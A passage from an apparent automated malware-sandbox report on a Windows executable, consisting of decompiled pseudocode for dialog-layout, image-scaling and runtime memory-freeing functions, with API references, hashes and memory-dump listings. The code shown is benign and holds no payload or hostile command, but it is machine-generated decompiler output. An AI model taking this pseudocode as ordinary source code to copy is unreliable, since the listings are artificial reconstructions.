				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				struct HWND__* _t107;
				signed int _t120;
				signed int _t135;
				void* _t151;
				void* _t156;
				char _t157;
				void* _t158;
				signed int _t159;
				intOrPtr _t161;
				void* _t164;
				void* _t170;
				long _t171;
				signed int _t175;
				signed int _t179;
				signed int _t186;
				struct HWND__* _t187;
				struct HWND__* _t188;
				void* _t189;
				void* _t192;
				signed int _t193;
				long _t194;
				void* _t201;
				int* _t202;
				struct HWND__* _t203;
				void* _t205;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t214;

				_t203 = __ecx;
				_v2368.bottom = __ecx;
				E01213FD6( &_v2208, 0x50, L"$%s:", _a8);
				_t208 =  &_v2368 + 0x10;
				E012214F2( &_v2208,  &_v2288, 0x50);
				_t96 = E01233470( &_v2300);
				_t187 = _v8;
				_t156 = 0;
				_v2376 = _t96;
				_t210 =  *0x124d5f4 - _t156; // 0x63
				if(_t210 <= 0) {
					L8:
					_t157 = E0121D02E(_t156, _t203, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t157;
					GetWindowRect(_t187,  &_v2352);
					GetClientRect(_t187,  &(_v2320.top));
					_t170 = _v2352.right - _v2352.left + 1;
					_t179 = _v2320.bottom;
					_t192 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t205 = _t192 - _v2304;
					_v2368.bottom = _t170 - _t179;
					if(_t157 == 0) {
						L15:
						_t222 = _a12;
						if(_a12 == 0 && E0121D0B1(_t157, _v2368.bottom, _t222, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t187,  &_v2048);
						}
						L18:
						_t206 = _t205 - GetSystemMetrics(8);
						_t107 = GetWindow(_t187, 5);
						_t188 = _t107;
						_v2368.bottom = _t188;
						if(_t157 == 0) {
							L24:
							return _t107;
						}
						_t158 = 0;
						while(_t188 != 0) {
							__eflags = _t158 - 0x200;
							if(_t158 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t188,  &_v2320);
							_t171 = _v2320.top.left;
							_t193 = 0x64;
							asm("cdq");
							_t194 = _v2320.left;
							asm("cdq");
							_t120 = (_t171 - _t206 - _v2336) * _v2368.top;
							asm("cdq");
							_t175 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0x1271150(_t188, 0, (_t194 - (_v2352.right - _t120 % _t175 >> 1) - _v2352.bottom) * _v2368.right / _t175, _t120 / _t175, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t171 + 1) * _v2368.top / _t193, 0x204);
							_t107 = GetWindow(_t188, 2);
							_t188 = _t107;
							__eflags = _t188 - _v2384;
							if(_t188 == _v2384) {
								goto L24;
							}
							_t158 = _t158 + 1;
							__eflags = _t158;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t159 = 0x64;
					asm("cdq");
					_t135 = _v2292 * _v2368.top;
					_t161 = _t179 * _v2368.right / _t159 + _v2352.right;
					_v2324 = _t161;
					asm("cdq");
					_t186 = _t135 % _v2352.top;
					_v2352.left = _t135 / _v2352.top + _t205;
					asm("cdq");
					asm("cdq");
					_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
					_t164 = (_t170 - _t161 - _t186 >> 1) + _v2352.bottom;
					if(_t164 < 0) {
						_t164 = 0;
					}
					if(_t201 < 0) {
						_t201 = 0;
					}
					 *0x1271150(_t187, 0, _t164, _t201, _v2324, _v2352.left,  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t187,  &_v2368);
					_t157 = _v2393;
					goto L15;
				} else {
					_t202 = 0x124d154;
					do {
						if( *_t202 > 0) {
							_t9 =  &(_t202[1]); // 0x12436b8
							_t151 = E01235D20( &_v2288,  *_t9, _t96);
							_t208 = _t208 + 0xc;
							if(_t151 == 0) {
								_t12 =  &(_t202[1]); // 0x12436b8
								if(E0121D208(_t156, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t187,  *_t202,  &_v2048);
								}
							}
							_t96 = _v2368.top;
						}
						_t156 = _t156 + 1;
						_t202 =  &(_t202[3]);
						_t214 = _t156 -  *0x124d5f4; // 0x63
					} while (_t214 < 0);
					goto L8;
				}
			}



















































                                                                                                                                                    0x0121d9f0
                                                                                                                                                    0x0121d9fa
                                                                                                                                                    0x0121d9fe
                                                                                                                                                    0x0121da03
                                                                                                                                                    0x0121da15
                                                                                                                                                    0x0121da1f
                                                                                                                                                    0x0121da24
                                                                                                                                                    0x0121da2b
                                                                                                                                                    0x0121da2e
                                                                                                                                                    0x0121da32
                                                                                                                                                    0x0121da38
                                                                                                                                                    0x0121da95
                                                                                                                                                    0x0121daad
                                                                                                                                                    0x0121dab5
                                                                                                                                                    0x0121dab9
                                                                                                                                                    0x0121dac5
                                                                                                                                                    0x0121dad7
                                                                                                                                                    0x0121dade
                                                                                                                                                    0x0121dae2
                                                                                                                                                    0x0121dae5
                                                                                                                                                    0x0121daed
                                                                                                                                                    0x0121daf3
                                                                                                                                                    0x0121daf9
                                                                                                                                                    0x0121db9c
                                                                                                                                                    0x0121db9c
                                                                                                                                                    0x0121dba4
                                                                                                                                                    0x0121dbd5
                                                                                                                                                    0x0121dbd5
                                                                                                                                                    0x0121dbdb
                                                                                                                                                    0x0121dbe6
                                                                                                                                                    0x0121dbe8
                                                                                                                                                    0x0121dbee
                                                                                                                                                    0x0121dbf0
                                                                                                                                                    0x0121dbf6
                                                                                                                                                    0x0121dca8
                                                                                                                                                    0x0121dca8
                                                                                                                                                    0x0121dca8
                                                                                                                                                    0x0121dbfc
                                                                                                                                                    0x0121dc96
                                                                                                                                                    0x0121dc03
                                                                                                                                                    0x0121dc09
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121dc15
                                                                                                                                                    0x0121dc1f
                                                                                                                                                    0x0121dc34
                                                                                                                                                    0x0121dc39
                                                                                                                                                    0x0121dc3c
                                                                                                                                                    0x0121dc52
                                                                                                                                                    0x0121dc5a
                                                                                                                                                    0x0121dc5c
                                                                                                                                                    0x0121dc5d
                                                                                                                                                    0x0121dc65
                                                                                                                                                    0x0121dc77
                                                                                                                                                    0x0121dc7e
                                                                                                                                                    0x0121dc87
                                                                                                                                                    0x0121dc8d
                                                                                                                                                    0x0121dc8f
                                                                                                                                                    0x0121dc93
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121dc95
                                                                                                                                                    0x0121dc95
                                                                                                                                                    0x0121dc95
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121dc96
                                                                                                                                                    0x0121db07
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121db14
                                                                                                                                                    0x0121db17
                                                                                                                                                    0x0121db20
                                                                                                                                                    0x0121db25
                                                                                                                                                    0x0121db2b
                                                                                                                                                    0x0121db2f
                                                                                                                                                    0x0121db30
                                                                                                                                                    0x0121db36
                                                                                                                                                    0x0121db40
                                                                                                                                                    0x0121db47
                                                                                                                                                    0x0121db50
                                                                                                                                                    0x0121db54
                                                                                                                                                    0x0121db58
                                                                                                                                                    0x0121db5a
                                                                                                                                                    0x0121db5a
                                                                                                                                                    0x0121db5e
                                                                                                                                                    0x0121db60
                                                                                                                                                    0x0121db60
                                                                                                                                                    0x0121db86
                                                                                                                                                    0x0121db92
                                                                                                                                                    0x0121db98
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121da3a
                                                                                                                                                    0x0121da3a
                                                                                                                                                    0x0121da3f
                                                                                                                                                    0x0121da42
                                                                                                                                                    0x0121da45
                                                                                                                                                    0x0121da4d
                                                                                                                                                    0x0121da52
                                                                                                                                                    0x0121da57
                                                                                                                                                    0x0121da68
                                                                                                                                                    0x0121da72
                                                                                                                                                    0x0121da7f
                                                                                                                                                    0x0121da7f
                                                                                                                                                    0x0121da72
                                                                                                                                                    0x0121da85
                                                                                                                                                    0x0121da85
                                                                                                                                                    0x0121da89
                                                                                                                                                    0x0121da8a
                                                                                                                                                    0x0121da8d
                                                                                                                                                    0x0121da8d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121da3f

                                                                                                                                                    APIs
                                                                                                                                                    • _swprintf.LIBCMT ref: 0121D9FE
                                                                                                                                                      • Part of subcall function 01213FD6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01213FE9
                                                                                                                                                      • Part of subcall function 012214F2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,0124FEE8,?,0121D142,00000000,?,00000050,0124FEE8), ref: 0122150F
                                                                                                                                                    • _strlen.LIBCMT ref: 0121DA1F
                                                                                                                                                    • SetDlgItemTextW.USER32(?,0124D154,?), ref: 0121DA7F
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0121DAB9
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0121DAC5
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0121DB65
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0121DB92
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0121DBD5
                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0121DBDD
                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0121DBE8
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0121DC15
                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0121DC87
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                                    • String ID: $%s:$CAPTION$d
                                                                                                                                                    • API String ID: 2407758923-2512411981
                                                                                                                                                    • Opcode ID: 72ccfb37c53b5d0da3a2c90a5b94876daba12c969528a6b4675faf1a7fb70d8c
                                                                                                                                                    • Instruction ID: 5fd324cd7ba85193675b746a79337663a4e1b133aadf0f8d842ddec073f5517e
                                                                                                                                                    • Opcode Fuzzy Hash: 72ccfb37c53b5d0da3a2c90a5b94876daba12c969528a6b4675faf1a7fb70d8c
                                                                                                                                                    • Instruction Fuzzy Hash: 8581BF72118306AFD721CFA8DC89B6FBBE9FF88704F04092DFA8597244D670E9058B52
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123C102, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0123C102(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x124dd50) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E0123835E(_t46);
							E0123BCE1( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E0123835E(_t47);
							E0123BDDF( *((intOrPtr*)(_t74 + 0x88)));
						}
						E0123835E( *((intOrPtr*)(_t74 + 0x7c)));
						E0123835E( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E0123835E( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E0123835E( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E0123835E( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E0123835E( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0123C275( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x124d818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E0123835E(_t31);
							E0123835E( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E0123835E(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E0123835E(_t74);
			}















                                                                                                                                                    0x0123c10a
                                                                                                                                                    0x0123c10e
                                                                                                                                                    0x0123c116
                                                                                                                                                    0x0123c11f
                                                                                                                                                    0x0123c124
                                                                                                                                                    0x0123c12b
                                                                                                                                                    0x0123c133
                                                                                                                                                    0x0123c13b
                                                                                                                                                    0x0123c146
                                                                                                                                                    0x0123c14c
                                                                                                                                                    0x0123c14d
                                                                                                                                                    0x0123c155
                                                                                                                                                    0x0123c15d
                                                                                                                                                    0x0123c168
                                                                                                                                                    0x0123c16e
                                                                                                                                                    0x0123c172
                                                                                                                                                    0x0123c17d
                                                                                                                                                    0x0123c183
                                                                                                                                                    0x0123c124
                                                                                                                                                    0x0123c184
                                                                                                                                                    0x0123c18c
                                                                                                                                                    0x0123c19f
                                                                                                                                                    0x0123c1b2
                                                                                                                                                    0x0123c1c0
                                                                                                                                                    0x0123c1cb
                                                                                                                                                    0x0123c1d0
                                                                                                                                                    0x0123c1d9
                                                                                                                                                    0x0123c1e1
                                                                                                                                                    0x0123c1e2
                                                                                                                                                    0x0123c1e8
                                                                                                                                                    0x0123c1eb
                                                                                                                                                    0x0123c1ee
                                                                                                                                                    0x0123c1f5
                                                                                                                                                    0x0123c1f7
                                                                                                                                                    0x0123c1fb
                                                                                                                                                    0x0123c203
                                                                                                                                                    0x0123c20a
                                                                                                                                                    0x0123c210
                                                                                                                                                    0x0123c211
                                                                                                                                                    0x0123c211
                                                                                                                                                    0x0123c218
                                                                                                                                                    0x0123c21a
                                                                                                                                                    0x0123c21f
                                                                                                                                                    0x0123c227
                                                                                                                                                    0x0123c22c
                                                                                                                                                    0x0123c22d
                                                                                                                                                    0x0123c22d
                                                                                                                                                    0x0123c230
                                                                                                                                                    0x0123c233
                                                                                                                                                    0x0123c236
                                                                                                                                                    0x0123c239
                                                                                                                                                    0x0123c239
                                                                                                                                                    0x0123c24b

                                                                                                                                                    APIs
                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0123C146
                                                                                                                                                      • Part of subcall function 0123BCE1: _free.LIBCMT ref: 0123BCFE
                                                                                                                                                      • Part of subcall function 0123BCE1: _free.LIBCMT ref: 0123BD10
                                                                                                                                                      • Part of subcall function 0123BCE1: _free.LIBCMT ref: 0123BD22
                                                                                                                                                      • Part of subcall function 0123BCE1: _free.LIBCMT ref: 0123BD34
                                                                                                                                                      • Part of subcall function 0123BCE1: _free.LIBCMT ref: 0123BD46
                                                                                                                                                      • Part of subcall function 0123BCE1: _free.LIBCMT ref: 0123BD58
                                                                                                                                                      • Part of subcall function 0123BCE1: _free.LIBCMT ref: 0123BD6A
                                                                                                                                                      • Part of subcall function 0123BCE1: _free.LIBCMT ref: 0123BD7C
                                                                                                                                                      • Part of subcall function 0123BCE1: _free.LIBCMT ref: 0123BD8E
                                                                                                                                                      • Part of subcall function 0123BCE1: _free.LIBCMT ref: 0123BDA0
                                                                                                                                                      • Part of subcall function 0123BCE1: _free.LIBCMT ref: 0123BDB2
                                                                                                                                                      • Part of subcall function 0123BCE1: _free.LIBCMT ref: 0123BDC4
                                                                                                                                                      • Part of subcall function 0123BCE1: _free.LIBCMT ref: 0123BDD6
                                                                                                                                                    • _free.LIBCMT ref: 0123C13B
                                                                                                                                                      • Part of subcall function 0123835E: RtlFreeHeap.NTDLL(00000000,00000000,?,0123BE76,?,00000000,?,00000000,?,0123BE9D,?,00000007,?,?,0123C29A,?), ref: 01238374
                                                                                                                                                      • Part of subcall function 0123835E: GetLastError.KERNEL32(?,?,0123BE76,?,00000000,?,00000000,?,0123BE9D,?,00000007,?,?,0123C29A,?,?), ref: 01238386
                                                                                                                                                    • _free.LIBCMT ref: 0123C15D
                                                                                                                                                    • _free.LIBCMT ref: 0123C172
                                                                                                                                                    • _free.LIBCMT ref: 0123C17D
                                                                                                                                                    • _free.LIBCMT ref: 0123C19F
                                                                                                                                                    • _free.LIBCMT ref: 0123C1B2
                                                                                                                                                    • _free.LIBCMT ref: 0123C1C0
                                                                                                                                                    • _free.LIBCMT ref: 0123C1CB
                                                                                                                                                    • _free.LIBCMT ref: 0123C203
                                                                                                                                                    • _free.LIBCMT ref: 0123C20A
                                                                                                                                                    • _free.LIBCMT ref: 0123C227
                                                                                                                                                    • _free.LIBCMT ref: 0123C23F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                    • Opcode ID: acc92329e41e4745883a99c4b3a185b417875d48895bc3768a22e771a6cecc60
                                                                                                                                                    • Instruction ID: 31515e4689fcfd7185958a9384fed8a1e96e743c14539148e5da103b2d3ef25b
                                                                                                                                                    • Opcode Fuzzy Hash: acc92329e41e4745883a99c4b3a185b417875d48895bc3768a22e771a6cecc60
                                                                                                                                                    • Instruction Fuzzy Hash: D231A4B26243069FEF21AB7CDC44B6677E5FF80210F14491AE688EB260DF31E860D754
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122CBAE, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0122CBAE(void* __ecx, void* __edx, void* __eflags, void* __fp0, short _a24, struct HWND__* _a4124) {
				void _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				struct HWND__* _t8;
				void* _t18;
				void* _t25;
				void* _t27;
				void* _t29;
				struct HWND__* _t32;
				struct HWND__* _t35;
				void* _t48;

				_t48 = __fp0;
				_t27 = __edx;
				E0122E1C0();
				_t8 = E01229C8A(__eflags);
				if(_t8 == 0) {
					L12:
					return _t8;
				}
				_t8 = GetWindow(_a4124, 5);
				_t32 = _t8;
				_t29 = 0;
				_t35 = _t32;
				if(_t32 == 0) {
					L11:
					goto L12;
				}
				while(_t29 < 0x200) {
					GetClassNameW(_t32,  &_a24, 0x800);
					if(E01221708( &_a24, L"STATIC") == 0 && (GetWindowLongW(_t32, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t25 = SendMessageW(_t32, 0x173, 0, 0);
						if(_t25 != 0) {
							GetObjectW(_t25, 0x18,  &_v0);
							_t18 = E01229CEC(_v4);
							SendMessageW(_t32, 0x172, 0, E01229EDB(_t27, _t48, _t25, E01229CA9(_v12), _t18));
							DeleteObject(_t25);
						}
					}
					_t8 = GetWindow(_t32, 2);
					_t32 = _t8;
					if(_t32 != _t35) {
						_t29 = _t29 + 1;
						if(_t32 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}














                                                                                                                                                    0x0122cbae
                                                                                                                                                    0x0122cbae
                                                                                                                                                    0x0122cbb3
                                                                                                                                                    0x0122cbb8
                                                                                                                                                    0x0122cbbf
                                                                                                                                                    0x0122cc96
                                                                                                                                                    0x0122cc9c
                                                                                                                                                    0x0122cc9c
                                                                                                                                                    0x0122cbd1
                                                                                                                                                    0x0122cbd7
                                                                                                                                                    0x0122cbd9
                                                                                                                                                    0x0122cbdb
                                                                                                                                                    0x0122cbdf
                                                                                                                                                    0x0122cc93
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122cc95
                                                                                                                                                    0x0122cbe6
                                                                                                                                                    0x0122cbfd
                                                                                                                                                    0x0122cc14
                                                                                                                                                    0x0122cc36
                                                                                                                                                    0x0122cc3a
                                                                                                                                                    0x0122cc44
                                                                                                                                                    0x0122cc4e
                                                                                                                                                    0x0122cc6d
                                                                                                                                                    0x0122cc74
                                                                                                                                                    0x0122cc74
                                                                                                                                                    0x0122cc3a
                                                                                                                                                    0x0122cc7d
                                                                                                                                                    0x0122cc83
                                                                                                                                                    0x0122cc87
                                                                                                                                                    0x0122cc89
                                                                                                                                                    0x0122cc8c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122cc8c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122cc87
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0122CBD1
                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0122CBFD
                                                                                                                                                      • Part of subcall function 01221708: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011708,0121BA45,00000000,.exe,?,?,00000800,?,?,0122854F,?), ref: 0122171E
                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0122CC19
                                                                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0122CC30
                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0122CC44
                                                                                                                                                      • Part of subcall function 01229CEC: GetDC.USER32(00000000), ref: 01229CF8
                                                                                                                                                      • Part of subcall function 01229CEC: GetDeviceCaps.GDI32(00000000,0000005A), ref: 01229D07
                                                                                                                                                      • Part of subcall function 01229CEC: ReleaseDC.USER32(00000000,00000000), ref: 01229D15
                                                                                                                                                      • Part of subcall function 01229CA9: GetDC.USER32(00000000), ref: 01229CB5
                                                                                                                                                      • Part of subcall function 01229CA9: GetDeviceCaps.GDI32(00000000,00000058), ref: 01229CC4
                                                                                                                                                      • Part of subcall function 01229CA9: ReleaseDC.USER32(00000000,00000000), ref: 01229CD2
                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0122CC6D
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0122CC74
                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0122CC7D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                                                                                    • String ID: STATIC
                                                                                                                                                    • API String ID: 1444658586-1882779555
                                                                                                                                                    • Opcode ID: ecf5bd09e73c7cd711b9e5098c7ace690b6555a9a1f3d0e5d43f7c25faae27e8
                                                                                                                                                    • Instruction ID: 550bd22e00b61a32cd7e9233ae399ebdb6c498de8c6dd084cc85c1ccc5c448fb
                                                                                                                                                    • Opcode Fuzzy Hash: ecf5bd09e73c7cd711b9e5098c7ace690b6555a9a1f3d0e5d43f7c25faae27e8
                                                                                                                                                    • Instruction Fuzzy Hash: 391103322603727BEB326B74EC4DFBF7A9CAF55741F004421FF41A6085DA64892587B5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01238D31, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E01238D31(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x1244eb0) {
					E0123835E(_t52);
					_t26 = _a4;
				}
				E0123835E( *((intOrPtr*)(_t26 + 0x3c)));
				E0123835E( *((intOrPtr*)(_a4 + 0x30)));
				E0123835E( *((intOrPtr*)(_a4 + 0x34)));
				E0123835E( *((intOrPtr*)(_a4 + 0x38)));
				E0123835E( *((intOrPtr*)(_a4 + 0x28)));
				E0123835E( *((intOrPtr*)(_a4 + 0x2c)));
				E0123835E( *((intOrPtr*)(_a4 + 0x40)));
				E0123835E( *((intOrPtr*)(_a4 + 0x44)));
				E0123835E( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E01238BF6(5,  &_v8);
				_v8 =  &_a4;
				return E01238C46(4,  &_v8);
			}




                                                                                                                                                    0x01238d37
                                                                                                                                                    0x01238d3a
                                                                                                                                                    0x01238d42
                                                                                                                                                    0x01238d45
                                                                                                                                                    0x01238d4a
                                                                                                                                                    0x01238d4d
                                                                                                                                                    0x01238d51
                                                                                                                                                    0x01238d5c
                                                                                                                                                    0x01238d67
                                                                                                                                                    0x01238d72
                                                                                                                                                    0x01238d7d
                                                                                                                                                    0x01238d88
                                                                                                                                                    0x01238d93
                                                                                                                                                    0x01238d9e
                                                                                                                                                    0x01238dac
                                                                                                                                                    0x01238db4
                                                                                                                                                    0x01238dbd
                                                                                                                                                    0x01238dc5
                                                                                                                                                    0x01238dd9

                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 01238D45
                                                                                                                                                      • Part of subcall function 0123835E: RtlFreeHeap.NTDLL(00000000,00000000,?,0123BE76,?,00000000,?,00000000,?,0123BE9D,?,00000007,?,?,0123C29A,?), ref: 01238374
                                                                                                                                                      • Part of subcall function 0123835E: GetLastError.KERNEL32(?,?,0123BE76,?,00000000,?,00000000,?,0123BE9D,?,00000007,?,?,0123C29A,?,?), ref: 01238386
                                                                                                                                                    • _free.LIBCMT ref: 01238D51
                                                                                                                                                    • _free.LIBCMT ref: 01238D5C
                                                                                                                                                    • _free.LIBCMT ref: 01238D67
                                                                                                                                                    • _free.LIBCMT ref: 01238D72
                                                                                                                                                    • _free.LIBCMT ref: 01238D7D
                                                                                                                                                    • _free.LIBCMT ref: 01238D88
                                                                                                                                                    • _free.LIBCMT ref: 01238D93
                                                                                                                                                    • _free.LIBCMT ref: 01238D9E
                                                                                                                                                    • _free.LIBCMT ref: 01238DAC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 6223c04811c1f564a5e428c6b02f3d43eac18fa2cd4be7a5d1a55c06b7ce4fd6
                                                                                                                                                    • Instruction ID: 1f912d0f0fd28af5b757dd977e8de8f5fd9d9fe30011543d022ab67096086056
